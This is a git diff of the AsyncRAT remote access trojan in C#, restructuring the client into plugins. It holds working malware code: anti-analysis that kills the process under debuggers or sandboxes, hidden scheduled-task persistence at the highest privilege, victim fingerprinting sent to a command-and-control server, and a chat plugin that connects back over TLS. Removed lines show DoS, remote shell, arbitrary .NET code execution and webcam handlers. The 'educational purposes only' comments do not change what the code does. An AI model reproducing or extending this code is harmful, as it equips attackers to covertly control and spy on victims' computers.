+ Debug.WriteLine("plguin not found");
+ }
}
- else
+ if (plugins.Count > 0)
{
- HandleLimeLogger.isON = false;
+ MsgPack msgPack = new MsgPack();
+ msgPack.ForcePathObject("Packet").SetAsString("sendPlugin");
+ msgPack.ForcePathObject("Hashes").SetAsString(string.Join(",", plugins));
+ ClientSocket.Send(msgPack.Encode2Bytes());
}
break;
}
- case "visitURL":
- {
- string url = unpack_msgpack.ForcePathObject("URL").AsString;
- if (url.StartsWith("http"))
- {
- Process.Start(url);
- }
- break;
- }
-
- case "dos":
- {
- switch (unpack_msgpack.ForcePathObject("Option").AsString)
- {
- case "postStart":
- {
- ctsDos = new CancellationTokenSource();
- new HandleDos().DosPost(unpack_msgpack);
- break;
- }
-
- case "postStop":
- {
- ctsDos.Cancel();
- break;
- }
- }
- break;
- }
-
- case "shell":
- {
- HandleShell.StarShell();
- break;
- }
-
- case "shellWriteInput":
- {
- if (HandleShell.ProcessShell != null)
- HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
- break;
- }
-
- case "chat":
- {
- new HandlerChat().CreateChat();
- break;
- }
-
- case "chatWriteInput":
- {
- new HandlerChat().WriteInput(unpack_msgpack);
- break;
- }
-
- case "chatExit":
- {
- new HandlerChat().ExitChat();
- break;
- }
-
- case "pcOptions":
- {
- new HandlePcOptions(unpack_msgpack.ForcePathObject("Option").AsString);
- break;
- }
-
- case "reportWindow":
- {
- new HandleReportWindow(unpack_msgpack);
- break;
- }
-
-
- case "torrent":
- {
- new HandleTorrent(unpack_msgpack);
- break;
- }
-
- case "executeDotNetCode":
- {
- new HandlerExecuteDotNetCode(unpack_msgpack);
- break;
- }
-
- case "blankscreen":
- {
- HandleBlankScreen.RunBlankScreen();
- break;
- }
-
- case "webcam":
- {
- HandleWebcam.Run(unpack_msgpack);
- break;
- }
-
-
- //case "netStat":
- // {
- // HandleNetStat.RunNetStat();
- // break;
- // }
+ //case "cleanPlugin": // server want to clean and re save all plugins
+ // {
+ // SetRegistry.DeleteSubKey();
+ // MsgPack msgPack = new MsgPack();
+ // msgPack.ForcePathObject("Packet").SetAsString("sendPlugin+");
+ // ClientSocket.Send(msgPack.Encode2Bytes());
+ // break;
+ // }
}
}
catch (Exception ex)
@@ -260,13 +84,6 @@ namespace Client.Handle_Packet
}
}
- private static void Received()
- {
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "Received";
- ClientSocket.Send(msgpack.Encode2Bytes());
- }
-
public static void Error(string ex)
{
MsgPack msgpack = new MsgPack();
diff --git a/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs b/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
index 1fbabf1..c58fa2e 100644
--- a/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
+++ b/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
@@ -14,8 +14,6 @@ using System.Runtime.InteropServices;
// This program is distributed for educational purposes only.
-
-
namespace Client.Helper
{
@@ -24,8 +22,7 @@ namespace Client.Helper
public static void RunAntiAnalysis()
{
if (DetectManufacturer() || DetectDebugger() || DetectSandboxie() || IsSmallDisk() || IsXP())
- //Environment.FailFast(null);
- new HandleUninstall();
+ Environment.FailFast(null);
}
private static bool IsSmallDisk()
diff --git a/AsyncRAT-C#/Client/Helper/Methods.cs b/AsyncRAT-C#/Client/Helper/Methods.cs
index 50de55b..342a224 100644
--- a/AsyncRAT-C#/Client/Helper/Methods.cs
+++ b/AsyncRAT-C#/Client/Helper/Methods.cs
@@ -25,14 +25,9 @@ namespace Client.Helper
{
try
{
- StringBuilder sb = new StringBuilder();
- sb.Append(Environment.ProcessorCount);
- sb.Append(Environment.UserName);
- sb.Append(Environment.MachineName);
- sb.Append(Environment.OSVersion);
- sb.Append(new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize);
- return GetHash(sb.ToString());
-
+ return GetHash(string.Concat(Environment.ProcessorCount, Environment.UserName,
+ Environment.MachineName, Environment.OSVersion
+ , new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize));
}
catch
{
@@ -48,10 +43,10 @@ namespace Client.Helper
StringBuilder strResult = new StringBuilder();
foreach (byte b in bytesToHash)
strResult.Append(b.ToString("x2"));
- return strResult.ToString().Substring(0, 15).ToUpper();
+ return strResult.ToString().Substring(0, 20).ToUpper();
}
- private static Mutex _appMutex;
+ public static Mutex _appMutex;
public static bool CreateMutex()
{
bool createdNew;
@@ -109,7 +104,7 @@ namespace Client.Helper
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
- msgpack.ForcePathObject("HWID").AsString = HWID();
+ msgpack.ForcePathObject("HWID").AsString = Settings.Hwid;
msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString().Replace("Microsoft", null) + " " +
Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
diff --git a/AsyncRAT-C#/Client/Helper/SetRegistry.cs b/AsyncRAT-C#/Client/Helper/SetRegistry.cs
new file mode 100644
index 0000000..6723938
--- /dev/null
+++ b/AsyncRAT-C#/Client/Helper/SetRegistry.cs
@@ -0,0 +1,89 @@
+using Client.Handle_Packet;
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace Client.Helper
+{
+ public static class SetRegistry
+ {
+ private static readonly string ID = @"Software\" + Settings.Hwid;
+
+ /*
+ * Author : NYAN CAT
+ * Name : Lime Registry DB
+ * Contact Me : https:github.com/NYAN-x-CAT
+ * This program is distributed for educational purposes only.
+ */
+
+ public static bool SetValue(string name, string value)
+ {
+ try
+ {
+ using (RegistryKey key = Registry.CurrentUser.CreateSubKey(ID, RegistryKeyPermissionCheck.ReadWriteSubTree))
+ {
+ key.SetValue(name, value, RegistryValueKind.ExpandString);
+ return true;
+ }
+ }
+ catch (Exception ex)
+ {
+ Packet.Error(ex.Message);
+ }
+ return false;
+ }
+
+ public static string GetValue(string value)
+ {
+ try
+ {
+ using (RegistryKey key = Registry.CurrentUser.CreateSubKey(ID))
+ {
+ object o = key.GetValue(value);
+ return (string)o;
+ }
+ }
+ catch (Exception ex)
+ {
+ Packet.Error(ex.Message);
+ }
+ return null;
+ }
+
+ public static bool DeleteValue(string name)
+ {
+ try
+ {
+ using (RegistryKey key = Registry.CurrentUser.CreateSubKey(ID))
+ {
+ key.DeleteValue(name);
+ return true;
+ }
+ }
+ catch (Exception ex)
+ {
+ Packet.Error(ex.Message);
+ }
+ return false;
+ }
+
+ public static bool DeleteSubKey()
+ {
+ try
+ {
+ using (RegistryKey key = Registry.CurrentUser.OpenSubKey("", true))
+ {
+ key.DeleteSubKeyTree(ID);
+ return true;
+ }
+ }
+ catch (Exception ex)
+ {
+ Packet.Error(ex.Message);
+ }
+ return false;
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs
index 2ad11d7..e8bee7c 100644
--- a/AsyncRAT-C#/Client/Install/NormalStartup.cs
+++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs
@@ -42,8 +42,8 @@ namespace Client.Install
{
StartInfo = new ProcessStartInfo
{
- FileName = "cmd.exe",
- Arguments = "/c schtasks /create /f /sc ONLOGON /RL HIGHEST /tn " + @"""'" + Settings.InstallFile + @"""'" + " /tr " + @"""'" + installfullpath + @"""'",
+ FileName = "schtasks.exe",
+ Arguments = "/create /f /sc ONLOGON /RL HIGHEST /tn " + @"""'" + Settings.InstallFile + @"""'" + " /tr " + @"""'" + installfullpath + @"""'",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
}
diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs
index 24bf80f..64c33d4 100644
--- a/AsyncRAT-C#/Client/Program.cs
+++ b/AsyncRAT-C#/Client/Program.cs
@@ -14,11 +14,9 @@ using Client.Helper;
namespace Client
{
- class Program
+ public class Program
{
-
-
- static void Main()
+ public static void Main()
{
Thread.Sleep(2500);
if (!Settings.InitializeSettings()) Environment.Exit(0);
@@ -48,7 +46,7 @@ namespace Client
ClientSocket.Reconnect();
ClientSocket.InitializeClient();
}
- Thread.Sleep(new Random().Next(1000,5000));
+ Thread.Sleep(new Random().Next(1000, 5000));
}
}
}
diff --git a/AsyncRAT-C#/Client/Properties/AssemblyInfo.cs b/AsyncRAT-C#/Client/Properties/AssemblyInfo.cs
index 521823b..7b016a5 100644
--- a/AsyncRAT-C#/Client/Properties/AssemblyInfo.cs
+++ b/AsyncRAT-C#/Client/Properties/AssemblyInfo.cs
@@ -10,7 +10,7 @@ using System.Runtime.InteropServices;
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("")]
-[assembly: AssemblyCopyright("Copyright © 2019")]
+[assembly: AssemblyCopyright("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs
index 9c025ab..5ea4c0a 100644
--- a/AsyncRAT-C#/Client/Settings.cs
+++ b/AsyncRAT-C#/Client/Settings.cs
@@ -1,4 +1,5 @@
using Client.Algorithm;
+using Client.Helper;
using System;
using System.IO;
using System.Security.Cryptography;
@@ -12,7 +13,7 @@ namespace Client
#if DEBUG
public static string Ports = "6606";
public static string Hosts = "127.0.0.1";
- public static string Version = "0.5.3";
+ public static string Version = "0.5.4";
public static string Install = "false";
public static string InstallFolder = "AppData";
public static string InstallFile = "Test.exe";
@@ -25,6 +26,7 @@ namespace Client
public static Aes256 aes256 = new Aes256(Key);
public static string Pastebin = "null";
public static string BDOS = "false";
+ public static string Hwid = Methods.HWID();
#else
public static string Ports = "%Ports%";
@@ -42,6 +44,7 @@ namespace Client
public static Aes256 aes256;
public static string Pastebin = "%Pastebin%";
public static string BDOS = "%BDOS%";
+ public static string Hwid = "";
#endif
@@ -62,6 +65,7 @@ namespace Client
Pastebin = aes256.Decrypt(Pastebin);
Anti = aes256.Decrypt(Anti);
BDOS = aes256.Decrypt(BDOS);
+ Hwid = Methods.HWID();
Serversignature = aes256.Decrypt(Serversignature);
ServerCertificate = new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate)));
return VerifyHash();
diff --git a/AsyncRAT-C#/Plugin/Chat/Chat.sln b/AsyncRAT-C#/Plugin/Chat/Chat.sln
new file mode 100644
index 0000000..6a20b53
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Chat/Chat.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29123.88
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Chat", "Chat\Chat.csproj", "{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {EF9C58BD-EA3A-4488-A8CD-871D19820CE4}
+ EndGlobalSection
+EndGlobal
diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj b/AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj
new file mode 100644
index 0000000..7e83127
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj
@@ -0,0 +1,67 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}
+ Library
+ Properties
+ Plugin
+ Chat
+ v4.0
+ 512
+ true
+
+
+ true
+ full
+ false
+ ..\..\..\Binaries\Debug\Plugins\
+ DEBUG;TRACE
+ prompt
+ 4
+
+
+ none
+ true
+ ..\..\..\Binaries\Release\Plugins\
+ TRACE
+ prompt
+ 4
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Form
+
+
+ FormChat.cs
+
+
+
+
+
+
+
+
+
+
+
+
+ FormChat.cs
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs b/AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs
new file mode 100644
index 0000000..762fb3d
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs
@@ -0,0 +1,214 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Connection
+ {
+ public static Socket TcpClient { get; set; }
+ public static SslStream SslClient { get; set; }
+ public static X509Certificate2 ServerCertificate { get; set; }
+ private static byte[] Buffer { get; set; }
+ private static long Buffersize { get; set; }
+ private static Timer Tick { get; set; }
+ private static MemoryStream MS { get; set; }
+ public static bool IsConnected { get; set; }
+ private static object SendSync { get; } = new object();
+ public static string Hwid { get; set; }
+
+ public static void InitializeClient()
+ {
+ try
+ {
+
+ TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
+ {
+ ReceiveBufferSize = 50 * 1024,
+ SendBufferSize = 50 * 1024,
+ };
+
+ TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
+ if (TcpClient.Connected)
+ {
+ Debug.WriteLine("Plugin Connected!");
+ IsConnected = true;
+ SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
+ SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
+ Buffer = new byte[4];
+ MS = new MemoryStream();
+ Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+
+ new Thread(() =>
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "chat-";
+ msgpack.ForcePathObject("Hwid").AsString = Hwid;
+ Send(msgpack.Encode2Bytes());
+ new HandlerChat().CreateChat();
+ }).Start();
+
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ Debug.WriteLine("Disconnected!");
+ IsConnected = false;
+ return;
+ }
+ }
+
+ private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
+ {
+#if DEBUG
+ return true;
+#endif
+ return ServerCertificate.Equals(certificate);
+ }
+
+ public static void Disconnected()
+ {
+
+ try
+ {
+ IsConnected = false;
+ Tick?.Dispose();
+ SslClient?.Dispose();
+ TcpClient?.Dispose();
+ MS?.Dispose();
+ }
+ catch { }
+ }
+
+ public static void ReadServertData(IAsyncResult ar)
+ {
+ try
+ {
+ if (!TcpClient.Connected || !IsConnected)
+ {
+ IsConnected = false;
+ return;
+ }
+ int recevied = SslClient.EndRead(ar);
+ if (recevied > 0)
+ {
+ MS.Write(Buffer, 0, recevied);
+ if (MS.Length == 4)
+ {
+ Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
+ Debug.WriteLine("/// Plugin Buffersize " + Buffersize.ToString() + " Bytes ///");
+ MS.Dispose();
+ MS = new MemoryStream();
+ if (Buffersize > 0)
+ {
+ Buffer = new byte[Buffersize];
+ while (MS.Length != Buffersize)
+ {
+ int rc = SslClient.Read(Buffer, 0, Buffer.Length);
+ if (rc == 0)
+ {
+ IsConnected = false;
+ return;
+ }
+ MS.Write(Buffer, 0, rc);
+ Buffer = new byte[Buffersize - MS.Length];
+ }
+ if (MS.Length == Buffersize)
+ {
+ Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
+ thread.Start(MS.ToArray());
+ Buffer = new byte[4];
+ MS.Dispose();
+ MS = new MemoryStream();
+ }
+ }
+ }
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+
+ public static void Send(byte[] msg)
+ {
+ lock (SendSync)
+ {
+ try
+ {
+ if (!IsConnected || msg == null)
+ {
+ return;
+ }
+
+ byte[] buffersize = BitConverter.GetBytes(msg.Length);
+ TcpClient.Poll(-1, SelectMode.SelectWrite);
+ SslClient.Write(buffersize, 0, buffersize.Length);
+
+ if (msg.Length > 1000000) //1mb
+ {
+ int chunkSize = 50 * 1024;
+ byte[] chunk = new byte[chunkSize];
+ using (MemoryStream buffereReader = new MemoryStream(msg))
+ {
+ BinaryReader binaryReader = new BinaryReader(buffereReader);
+ int bytesToRead = (int)buffereReader.Length;
+ do
+ {
+ chunk = binaryReader.ReadBytes(chunkSize);
+ bytesToRead -= chunkSize;
+ SslClient.Write(chunk, 0, chunk.Length);
+ SslClient.Flush();
+ } while (bytesToRead > 0);
+
+ binaryReader.Dispose();
+ }
+ }
+ else
+ {
+ SslClient.Write(msg, 0, msg.Length);
+ SslClient.Flush();
+ }
+ Debug.WriteLine("Plugin Packet Sent");
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ }
+
+ public static void CheckServer(object obj)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Ping!)";
+ Send(msgpack.Encode2Bytes());
+ GC.Collect();
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Client/Helper/FormChat.Designer.cs b/AsyncRAT-C#/Plugin/Chat/Chat/FormChat.Designer.cs
similarity index 99%
rename from AsyncRAT-C#/Client/Helper/FormChat.Designer.cs
rename to AsyncRAT-C#/Plugin/Chat/Chat/FormChat.Designer.cs
index 13dddcb..a834da0 100644
--- a/AsyncRAT-C#/Client/Helper/FormChat.Designer.cs
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/FormChat.Designer.cs
@@ -1,4 +1,4 @@
-namespace Client.Helper
+namespace Plugin
{
partial class FormChat
{
diff --git a/AsyncRAT-C#/Client/Helper/FormChat.cs b/AsyncRAT-C#/Plugin/Chat/Chat/FormChat.cs
similarity index 67%
rename from AsyncRAT-C#/Client/Helper/FormChat.cs
rename to AsyncRAT-C#/Plugin/Chat/Chat/FormChat.cs
index 9a68e21..57db6ba 100644
--- a/AsyncRAT-C#/Client/Helper/FormChat.cs
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/FormChat.cs
@@ -1,16 +1,13 @@
-using Client.Handle_Packet;
-using Client.MessagePack;
-using Client.Connection;
+using Plugin.MessagePack;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
-using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
-namespace Client.Helper
+namespace Plugin
{
public partial class FormChat : Form
{
@@ -26,8 +23,9 @@ namespace Client.Helper
richTextBox1.AppendText("Me: " + textBox1.Text + Environment.NewLine);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "chat";
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("WriteInput").AsString = Environment.UserName + ": " + textBox1.Text + Environment.NewLine;
- ClientSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
textBox1.Clear();
}
}
@@ -39,7 +37,16 @@ namespace Client.Helper
private void Timer1_Tick(object sender, EventArgs e)
{
- if (!ClientSocket.IsConnected) Packet.GetFormChat.Dispose();
+ if (!Connection.IsConnected)
+ {
+ Packet.GetFormChat.Invoke((MethodInvoker)(() =>
+ {
+ Packet.GetFormChat?.Close();
+ Packet.GetFormChat?.Dispose();
+ }));
+ Connection.Disconnected();
+ GC.Collect();
+ }
}
}
}
diff --git a/AsyncRAT-C#/Client/Helper/FormChat.resx b/AsyncRAT-C#/Plugin/Chat/Chat/FormChat.resx
similarity index 100%
rename from AsyncRAT-C#/Client/Helper/FormChat.resx
rename to AsyncRAT-C#/Plugin/Chat/Chat/FormChat.resx
diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/BytesTools.cs b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/BytesTools.cs
new file mode 100644
index 0000000..bd66e46
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/BytesTools.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public class BytesTools
+ {
+ static UTF8Encoding utf8Encode = new UTF8Encoding();
+
+ public static byte[] GetUtf8Bytes(String s)
+ {
+
+ return utf8Encode.GetBytes(s);
+ }
+
+ public static String GetString(byte[] utf8Bytes)
+ {
+ return utf8Encode.GetString(utf8Bytes);
+ }
+
+ public static String BytesAsString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:D3} ", b));
+ }
+ return sb.ToString();
+ }
+
+
+ public static String BytesAsHexString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:X2} ", b));
+ }
+ return sb.ToString();
+ }
+
+ ///
+ /// 交换byte数组数据
+ /// 可用于高低数据交换
+ ///
+ /// 要交换的byte数组
+ /// 返回交换后的数据
+ public static byte[] SwapBytes(byte[] v)
+ {
+ byte[] r = new byte[v.Length];
+ int j = v.Length - 1;
+ for (int i = 0; i < r.Length; i++)
+ {
+ r[i] = v[j];
+ j--;
+ }
+ return r;
+ }
+
+ public static byte[] SwapInt64(Int64 v)
+ {
+ //byte[] r = new byte[8];
+ //r[7] = (byte)v;
+ //r[6] = (byte)(v >> 8);
+ //r[5] = (byte)(v >> 16);
+ //r[4] = (byte)(v >> 24);
+ //r[3] = (byte)(v >> 32);
+ //r[2] = (byte)(v >> 40);
+ //r[1] = (byte)(v >> 48);
+ //r[0] = (byte)(v >> 56);
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ public static byte[] SwapInt32(Int32 v)
+ {
+ byte[] r = new byte[4];
+ r[3] = (byte)v;
+ r[2] = (byte)(v >> 8);
+ r[1] = (byte)(v >> 16);
+ r[0] = (byte)(v >> 24);
+ return r;
+ }
+
+
+ public static byte[] SwapInt16(Int16 v)
+ {
+ byte[] r = new byte[2];
+ r[1] = (byte)v;
+ r[0] = (byte)(v >> 8);
+ return r;
+ }
+
+ public static byte[] SwapDouble(Double v)
+ {
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPack.cs
new file mode 100644
index 0000000..131eb37
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPack.cs
@@ -0,0 +1,926 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+
+namespace Plugin.MessagePack
+{
+ public class MsgPackEnum : IEnumerator
+ {
+ List children;
+ int position = -1;
+
+ public MsgPackEnum(List obj)
+ {
+ children = obj;
+ }
+ object IEnumerator.Current
+ {
+ get { return children[position]; }
+ }
+
+ bool IEnumerator.MoveNext()
+ {
+ position++;
+ return (position < children.Count);
+ }
+
+ void IEnumerator.Reset()
+ {
+ position = -1;
+ }
+
+ }
+
+ public class MsgPackArray
+ {
+ List children;
+ MsgPack owner;
+
+ public MsgPackArray(MsgPack msgpackObj, List listObj)
+ {
+ owner = msgpackObj;
+ children = listObj;
+ }
+
+ public MsgPack Add()
+ {
+ return owner.AddArrayChild();
+ }
+
+ public MsgPack Add(String value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.AsString = value;
+ return obj;
+ }
+
+ public MsgPack Add(Int64 value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsInteger(value);
+ return obj;
+ }
+
+ public MsgPack Add(Double value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsFloat(value);
+ return obj;
+ }
+
+ public MsgPack this[int index]
+ {
+ get { return children[index]; }
+ }
+
+ public int Length
+ {
+ get { return children.Count; }
+ }
+ }
+
+ public class MsgPack : IEnumerable
+ {
+ string name;
+ string lowerName;
+ object innerValue;
+ MsgPackType valueType;
+ MsgPack parent;
+ List children = new List();
+ MsgPackArray refAsArray = null;
+
+ private void SetName(string value)
+ {
+ this.name = value;
+ this.lowerName = name.ToLower();
+ }
+
+ private void Clear()
+ {
+ for (int i = 0; i < children.Count; i++)
+ {
+ ((MsgPack)children[i]).Clear();
+ }
+ children.Clear();
+ }
+
+ private MsgPack InnerAdd()
+ {
+ MsgPack r = new MsgPack();
+ r.parent = this;
+ this.children.Add(r);
+ return r;
+ }
+
+ private int IndexOf(string name)
+ {
+ int i = -1;
+ int r = -1;
+
+ string tmp = name.ToLower();
+ foreach (MsgPack item in children)
+ {
+ i++;
+ if (tmp.Equals(item.lowerName))
+ {
+ r = i;
+ break;
+ }
+ }
+ return r;
+ }
+
+ public MsgPack FindObject(string name)
+ {
+ int i = IndexOf(name);
+ if (i == -1)
+ {
+ return null;
+ }
+ else
+ {
+ return this.children[i];
+ }
+ }
+
+
+ private MsgPack InnerAddMapChild()
+ {
+ if (valueType != MsgPackType.Map)
+ {
+ Clear();
+ this.valueType = MsgPackType.Map;
+ }
+ return InnerAdd();
+ }
+
+ private MsgPack InnerAddArrayChild()
+ {
+ if (valueType != MsgPackType.Array)
+ {
+ Clear();
+ this.valueType = MsgPackType.Array;
+ }
+ return InnerAdd();
+ }
+
+ public MsgPack AddArrayChild()
+ {
+ return InnerAddArrayChild();
+ }
+
+ private void WriteMap(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x80 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDE;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDF;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+ for (int i = 0; i < len; i++)
+ {
+ WriteTools.WriteString(ms, children[i].name);
+ children[i].Encode2Stream(ms);
+ }
+ }
+
+ private void WirteArray(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x90 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDC;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDD;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+
+ for (int i = 0; i < len; i++)
+ {
+ ((MsgPack)children[i]).Encode2Stream(ms);
+ }
+ }
+
+ public void SetAsInteger(Int64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Integer;
+ }
+
+ public void SetAsUInt64(UInt64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.UInt64;
+ }
+
+ public UInt64 GetAsUInt64()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToUInt64((Int64)this.innerValue);
+ case MsgPackType.UInt64:
+ return (UInt64)this.innerValue;
+ case MsgPackType.String:
+ return UInt64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToUInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToUInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToUInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+
+ }
+
+ public Int64 GetAsInteger()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return (Int64)this.innerValue;
+ case MsgPackType.UInt64:
+ return Convert.ToInt64((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Int64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToInt64((Double)this.innerValue);
+ case MsgPackType.Single:
